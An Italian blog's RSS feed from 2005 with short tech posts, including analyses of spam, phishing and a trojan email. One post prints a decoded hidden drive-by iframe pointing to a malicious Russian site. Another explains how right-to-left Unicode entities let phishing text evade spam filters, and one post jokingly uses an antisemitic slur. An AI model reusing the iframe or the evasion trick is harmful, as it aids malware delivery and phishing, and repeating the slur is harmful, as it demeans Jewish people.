<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.00">
<!-- vedi http://www.thegirliematters.com/tips/archives/0305/generate_rss_feeds_by_category.php -->
  <channel>
    <title>Notiziole di .mau.</title>
    <link>http://xmau.com/notiziole/</link>
    <description>Pensieri slegati che scrivo quando mi viene voglia</description>
    <language>it</language>
    <generator>Movable Type/5.01</generator>
    <docs>http://blogs.law.harvard.edu/tech/rss/</docs>
    <webMaster>dotmaudot+mt@gmail.com</webMaster>
    <pubDate>Sat, 17 Dec 2005 20:31:04 +0100</pubDate>

    <item>
      <title>e tutto ad un tratto...</title>
      <link>http://xmau.com/notiziole/arch/200512/001976.html</link>
      <description><![CDATA[<p>oggi funziona la schedina vecchia sul PC di Anna e non quella nuova sul mio. Secondo me, ci vuole un esorcista.</p>]]></description>
    </item>

    <item>
      <title>solite arti magiche</title>
      <link>http://xmau.com/notiziole/arch/200511/001934.html</link>
      <description><![CDATA[<p>Ieri sera Loris è passato a casa mia per vedere cosa non funzionava nella nostra rete wifi. Dopo due ore con tre PC (win98, xp e fedora), tre schedine wireless (una vecchia Orinoco, una rtl8180 e una Cisco) e due access point (il nostro digicom e quello portato da Loris) abbiamo scoperto che:<br />
- l'access point funziona<br />
- il mio PC funziona, ma non sembrano funzionare né la mia scheda wifi rtl (troppi CRC error in ricezione) né la mia schedina USB 2.0.<br />
- da qualche parte nel mio palazzo ci potrebbe essere un'apparecchiatura sulla frequenza 2.4 GB, che non è una rete wifi e soprattutto spara più o meno ovunque sulle frequenze;<br />
- spostandomi sul canale 1, l'orinoco funziona sul mio PC vicino all'access point, non sembra funzionare su quello di Anna lontano dall'access point. Ma qui mancano ancora ulteriori informazioni.<br />
Il tutto naturalmente senza nessuna certezza, altrimenti non staremmo parlando di informatica.</p>]]></description>
    </item>

    <item>
      <title>e-cartolina virale?</title>
      <link>http://xmau.com/notiziole/arch/200511/001920.html</link>
      <description><![CDATA[<p>Tra lo spam odierno, mi è arrivato il messaggio che affermava che avevo un "Multimedia Postcards(R) Greeting" per me, con tanto di sito dove andare a scaricare (http://www.bazumcircus.it/img/news2/) e codice ( DP_42a04492060aaa46). <br />
Per curiosità ho provato ad andare direttamente sulla homepage del sito... e Mozilla mi si è chiuso. A questo punto ho fatto quello che dovevo fare subito, vale a dire prendere Lynx: la home page mi dà (anzi mi dava, l'hanno già chiuso) una sfilza di link a siti che offrono medicinali sessuali, e terminava con un document.write scritto in esadecimale, che tradotto dà <br />
&lt;IFRA<span>ME</span> SRC="http://crunet.info/out.php?s_id=1" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"&gt;&lt;/IFRAME&gt;.<br />
crunet.info è un sito russo - o almeno scritto in russo, e quel php mi rimanda a un non meglio identificato http://195.225.177.33/0305.html; il quale però (senza ammettere cookie, ovvio) non dice molto. Zigh, una ricerchina fatta per nulla... però mi pareva più professionale del solito.</p>

<p><b>AGGIORNAMENTO:</b>Naturalmente io sono stato così stupido <b>da scrivere io</b> il testo "IFRAME". Solo che non usando internet explorer, naturalmente non mi capitava nulla, così come non è capitato nulla a chi mi legge con safari, mozilla, netscape ... (o via RSS). Adesso che <a href="http://zop.splinder.com/">zop</a> mi ha fatto notare la cosa ho scoperto la gabola (adesso la scritta non è più lanciabile, tranquilli!)</p>]]></description>
    </item>

    <item>
      <title>misteri di proxy</title>
      <link>http://xmau.com/notiziole/arch/200511/001912.html</link>
      <description><![CDATA[<p>Dall'ufficio mi connetto a Internet con un proxy. Come molti sanno, chi gestisce il proxy può fare tante belle cose, come bloccare - o magari rallentare molto - l'accesso a una serie di siti. In genere, questo capita con il porno; da noi, a quanto sembra, sotto la scure è caduto <a href="http://muttscomics.com/">Mutts</a> (sul porno non saprei dire). </p>]]></description>
    </item>

    <item>
      <title>pihshnig</title>
      <link>http://xmau.com/notiziole/arch/200511/001909.html</link>
      <description><![CDATA[<p>Di phishing ne ho parlato più volte, e ho anche fatto notare come l'italiano del testo (quando c'è) sia in genere piuttosto teorico. Ma per gli sfortunati che non hanno ricevuto questo messaggio - a me è fin arrivato doppio, una copia è stata riconosciuta come spam, l'altra no - non posso esimermi dal mostrarvelo.</p>

<p><em>Bcnaa Ietnsa/ BancoPtsoa/ San Paool IMI/ Finceo ceihde il vtsoro cotubirtno:<br />
Per i posesssori di un cnoto, a segotiu di virefiche di l'irednizzo di potsa enorttelica nei nirtso daatbase clienti, si e<br />
reos necoirasse uzzilito online la cofnerma dei Soui dait. Le chiedaimo pcreio di confermicra i dait in nsotro possesso,<br />
accedeodn al seugente form proteott:</em></p>

<p>No, non è il risultato di un dislessico, né un esercizio di stile à la Queneau. Andando a vedere il sorgente del messaggio, si scopre che il testo è in multipart/alternate (cioè, ci sono due pezzi che dovrebbero avere lo stesso contenuto), testo normale o html. Solo che il testo normale è in realtà vuoto, quindi deve per forza essere mostrato quello in HTML, che comincia così:</p>

<p>B&amp;#8238;cna&amp;#8236;a I&amp;#8238;etn&amp;#8236;sa/ BancoP&amp;#8238;tso&amp;#8236;a/ San Pao&amp;#8238;ol&amp;#8236; IMI/ Fin&amp;#8238;ce&amp;#8236;o c&amp;#8238;eih&amp;#8236;de il v&amp;#8238;tso&amp;#8236;ro co&amp;#8238;tubirtn&amp;#8236;o:</p>

<p>Non spaventatevi. I "caratteri" - se vogliamo fare gli esperti, dovremmo chiamarli "entità", ma chisseneimporta - &amp;#8238; e &amp;#8236; significano rispettivamente "da qua si scrive da destra a sinistra" e "da qua non si scrive più da destra a sinistra". Quindi, se apriamo il messaggio con un programma che capisce bene HTML, la prima parola è "B" , poi "cna" scritto alla rovescia e che quindi diventa "anc", e infine "a". Risultato? "Banca".<br />
In questo modo, però, i sistemi antispam non riescono a riconoscere la parola incriminata, e quindi non scatta l'allarme spam.<br />
Peccato (per lo spammer, intendo) che il sistema sia <b>troppo</b> intelligente, e ad esempio sull'interfaccia di Gmail non funzioni...</p>]]></description>
    </item>

    <item>
      <title>Toh.</title>
      <link>http://xmau.com/notiziole/arch/200510/001900.html</link>
      <description><![CDATA[<p><a href="http://img493.imageshack.us/my.php?image=splinderdefaced4sz.png"><img src="http://xmau.com/thumb/splinder.JPG" align="left" />Hanno defaced</a> (defacciato? sfacciato? insomma, hanno craccato la pagina mettendo il loro bel logo) la pagina delle <a href="http://edit.splinder.com/">comunità di Splinder</a>.</p>]]></description>
    </item>

    <item>
      <title>Il mio portatile si sfalda</title>
      <link>http://xmau.com/notiziole/arch/200510/001875.html</link>
      <description><![CDATA[<p>Non sono cose belle da dirsi. Però ha iniziato il mio mouse, che connettevo per mezzo di un adattatore alla porta PS/2 e a un tratto ha smesso di funzionare: se lo metto sulla porta USB funziona perfettamente, e mouse+adattatore vanno bene su un altro PC. Poi a un tratto la schedina wi-fi si è anch'essa bloccata, dando una sfilza di CRC errors e nemmeno un pacchetto ricevuto. Il router funziona, perché la schedina sulla macchina di Anna funziona perfettamente; la scheda non so, perché non ho voglia di installare tutto il software sull'altro pc. La scheda di Anna, che è più vecchia, vede la rete ma non ci si attacca. <br />
Mo' che faccio? io contavo di sopravviverci ancora un annetto, in fin dei conti il pc è del 2002. Una riparazione comincia a costarmi troppo. Forse un'imposizione delle mani?</p>]]></description>
    </item>

    <item>
      <title><![CDATA[un po&apos; di attenzione, insomma!]]></title>
      <link>http://xmau.com/notiziole/arch/200510/001869.html</link>
      <description><![CDATA[<p>Capisco volere fare del phishing scritto in un italiano diciamo "interessante" (che ne dite di &laquo;<em>se recentemente accedeste al vostro conto mentre viaggiavate</em>&raquo;?)<br />
Capisco che non sono molti a guardare le header e vedere che il messaggio è stato spedito da TLV62-0-78-214.bb.netvision.net.il (eh, questi sporchi ebrei... :-) )<br />
Però postare il messaggio usando come mittente <b>ChiquitaBayno</b>@bancopostaonline.poste.it mi pare un po' troppo!</p>]]></description>
    </item>

    <item>
      <title><![CDATA[GMail un po&apos; kaputt]]></title>
      <link>http://xmau.com/notiziole/arch/200510/001860.html</link>
      <description><![CDATA[<p>stasera sono arrivato a casa e ho cercato di guardare la posta. Peccato che il mio fido browser (e persino Internet Explorer) mi dicessero "sito irraggiungibile". In realtà le cose non stavano proprio così: infatti una connessione con Lynx ha portato a tutta una serie di lamentele su certificati che non si trovavano, ma alla fine mi ha fatto vedere il sito (con <em>un'altra</em> serie di lamentele, questa volta da parte di Gmail stesso, che mi spiegava che così "non avevo la vera experience". Seeh, ancora grazie si arrivasse così! Bisogna dire che Lynx è davvero una forza della natura, uno schiacciasassi.</p>]]></description>
    </item>

    <item>
      <title>Computer a manovella</title>
      <link>http://xmau.com/notiziole/arch/200510/001856.html</link>
      <description><![CDATA[<p>Chi avesse letto <em>City</em> venerdì scorso avrebbe trovato un trafiletto su un "portatile per bambini che funziona a manovella". La notizia di per sé è vera: <a href="http://www.pcworld.com/resource/article/0,aid,122771,pg,1,RSS,RSS,00.asp">PCWorld</a> ad esempio ne parla estesamente.<br />
Naturalmente le cose stanno in maniera un po' diversa da quanto traspare dall'italico quotidiano gratuito: non è il regalo di Natale da fare al proprio bimbo, ma è parte di un progetto di alfabetizzazione informatica per le scuole dei paesi in via di sviluppo. Negroponte (ma è tornato all'MIT?) ha già messo le mani avanti, dicendo che anche se il prototipo uscirà a novembre la produzione di massa non avverrà se non a fine 2006; e inoltre che sa bene che cento dollari sono ancora troppi, ma spera in un ulteriore ribasso dei costi. Però bisogna dire che ci sono delle idee interessanti: oltre alla manovella per i posti dove non c'è corrente - un minuto di giro permetterà dieci minuti d'uso - e che era già stata sfruttata nelle radio portatili, ci sarà la possibilità di convertire il display a colori in uno in bianco e nero ad alta visibilità. Per i fanatici: il sistema operativo sarà una versione minimale di Linux.<br />
Non so quanto un PC portatile possa essere utile a gente che magari non ha nemmeno di che mangiare, ma forse non è così male pensare anche oltre l'immediato; basta appunto che sia un "anche".</p>]]></description>
    </item>

    <item>
      <title>Avete presente i vaccini?</title>
      <link>http://xmau.com/notiziole/arch/200509/001836.html</link>
      <description><![CDATA[<p>Ecco il testo, tradotto in italiano, di un troiano che è arrivato su una mailing list che gestisco. Il testo era in HTML, e l'indirizzo era ovviamente di un iscritto alla lista che non c'entrava nulla: il messaggio proviene da un PC di Telecom Argentina. Il corsivo è mio.<hr /><br />
Klez.E è il più comune worm che si sta diffondendo in tutto il mondo. È molto pericoloso, corrompendo i vostri file.<br />
A causa del suo modo molto astuto di nascondersi e della tecnica anti-anti-virus, la maggior parte del software AV non riesce a scoprirlo o rimuoverlo.<br />
Abbiamo sviluppato questo programma gratuito di immunizzazione per sconfiggere questo virus maligno.<br />
Dovete solo lanciarlo una volta, e Klez non entrerà mai nel vostro PC.<br />
<em>NOTA: Poiché questo programma agisce come un finto Klez per confondere il vero worm, alcuni monitor AV potrebbero lamentarsi mentre lo fate girare.<br />
In tal caso, ignorate l'avviso e cliccate su 'continua'</em>.<br />
Per ogni questione, inviatemi una mail.<hr /><br />
Anche in questo caso ci troviamo di fronte a un sistema di "ingegneria sociale". L'utente quadratico medio ha sentito dire che i vaccini (quelli che ti iniettano) sono forme deboli dello stesso batterio che devono combattere, e quindi magari non si scompone a leggere qualcosa del genere...</p>]]></description>
    </item>

    <item>
      <title>google blog search</title>
      <link>http://xmau.com/notiziole/arch/200509/001824.html</link>
      <description><![CDATA[<p>Ecco l'ennesima beta di Google. Beh, non credo ci sia un progetto Google che non sia in beta :-). Ad ogni modo, con <a href="http://blogsearch.google.com/">Google Blog Search</a> è possibile fare una ricerca limitata ai blog. Leggendo le faq relative, si può scoprire che "blog" in questo contesto significa "qualcosa con un feed RSS o Atom"; che l'indicizzazione è partita da giugno; e che la ricerca può essere fatta con l'interfaccia google o con quella di blogger.<br />
Se devo essere sincero, non vedo un grande valore aggiunto, ma magari qualcuno ha delle idee migliori di me.</p>

<p><b>Aggiornamento</b>: il Guru <a href="http://www.bookcafe.net/blog/blog.cfm?id=346">ne ha</a>.</p>]]></description>
    </item>

    <item>
      <title>phishing su Fineco</title>
      <link>http://xmau.com/notiziole/arch/200509/001800.html</link>
      <description><![CDATA[<p>È quello di stanotte. Ll'italiano è indubbiamente molto strano, anche se grammaticalmente sembra corretto. Anche l'idea di dire "visto che bisogna aumentare la sicurezza, cambiamo server" non è affatto male, guardata dal punto di vista di uno che di internette non ci capisce un tubo. "Se al mercato mi cambiano la macchinetta per verificare le banconote false, qui mi cambiano il server": non è così immediato capire che l'URL è come l'indirizzo di casa, e quindi non ha ragione di essere modificato.<br />
Ma il top lo si raggiunge con la frase finale: <em>&laquo;... altrimenti entro 24 ore il Vostro conto internet per la Vostra stessa sicurezza verrà temporaneamente bloccato per far uscire i mezzi finanziari allo scopo di evitare il numero sempre più incremento di assalti "Phishing"&raquo;</em>. Me li vedo, questi mezzi finanziari che escono a vele spiegate!</p>

<p>In una notizia correlata, come dicono gli americani, mi hanno fatto notare un altro spam di ieri, da tale "Sateny Finance Group" che propone di <em>&laquo;effettuare il trasferimento dei pagamenti tra i nostri clienti, trattenendo una commissione per ogni operazione.&raquo;</em>, ricevendo <em>&laquo;pagamenti che vanno dai 1000 ai 50000 o più USD&raquo;</em>. Con ogni probabilità, riciclaggio.</p>]]></description>
    </item>

    <item>
      <title><![CDATA[quando si dice &quot;basta&quot;...]]></title>
      <link>http://xmau.com/notiziole/arch/200509/001798.html</link>
      <description><![CDATA[<p>In ufficio mi avevano dato una specie di portachiavi RSA SecurID&reg; che ogni minuto generava casualmente un numero di sei cifre che, unito al mio pin, completava la password per connettermi alla rete interna di IT Telecom prima e TIM poi, per la serie "massima sicurezza". Sul retro c'era indicata una data, 07/31/05, a cui non avevo fatto caso, anche perché in pratica non è che nell'ultimo anno l'abbia usata chissà quanto. <br />
Bene, prima di partire per le ferie avevo tolto il portachiavi dal marsupio: il numerino non c'è più, e il display segna un bell'OFF. Sicuramente quelli di RSA vogliono essere certi sulla durata dell'aggeggio!</p>]]></description>
    </item>

    <item>
      <title>congiunzioni astrali?</title>
      <link>http://xmau.com/notiziole/arch/200508/001778.html</link>
      <description><![CDATA[<p>Ad aprile <a href="http://xmau.com/notiziole/archives/001543.html">avevo scritto</a> che il mio PC non riusciva più a capire che i collegamenti dovevano essere attraversati e non aperti, quando volevo salvare un file.<br />
Oggi a quanto pare il clic funziona nuovamente. Non ho fatto assolutamente nulla, lo giuro. Sarà un sottoprodotto delle stelle cadenti  che in teoria oggi stanno allietando la vista di chi non si trova in mezzo a una grande città col cielo coperto?</p>]]></description>
    </item>

  </channel>
</rss>
